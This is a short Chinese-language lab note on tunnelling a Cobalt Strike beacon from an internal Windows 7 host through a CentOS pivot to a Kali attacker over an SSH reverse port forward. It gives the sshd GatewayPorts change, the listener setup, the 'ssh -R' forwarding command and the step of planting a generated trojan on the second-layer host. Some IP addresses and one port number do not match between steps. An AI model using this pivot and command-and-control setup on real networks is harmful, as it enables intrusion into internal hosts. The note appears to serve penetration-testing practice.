环境配置

* * * * * * * *

# 环境kali   NAT 192.168.220.189centos NAT 192.168.220.14       v4  192.168.22.136win7   v4  192.168.22.12

centos7.6添加vm4网卡方便与二层主机通讯，自动获取ip即可。

CS-SSH隧道上线 *

默认情况下，SSH守护程序只侦听127.0.0.1，所以我们将无法从外部访问我们转发的端口。

* * * * *

要让它在连接到Internet的接口上侦听，我们必须在SSH服务器的配置中启用GatewayPorts选项。[root@rsec ~]# vim /etc/ssh/sshd_configGatewayPorts yes或者[root@rsec ~]# sed -i s/"#GatewayPorts no"/"GatewayPorts yes"/g /etc/ssh/sshd_config

* * *

# cs创建监2个监听器kali-8000    192.168.220.189 8000 #用于上线centos-8080  192.168.22.136 8080 #用于生成木马

* * * * * * * * * * *

# kali中连接中转主机将centos中主机的8080端口转发到我们kali本地的80000端口ssh -R cs上线ip:8080:kali本机使用0代替:8000 root@中间机ip -vN

└─# ssh -R 192.168.22.132:8080:0.0.0.0:8000 root@192.168.220.145 -vN

# 上述转发成功后，在centos中转机查看开发的端口，发现8080已经开放[root@rsec ~]# netstat -pantu | grep 8080

*

# 生成木马选择centos-8080监听器，并将木马放入2层主机进行上线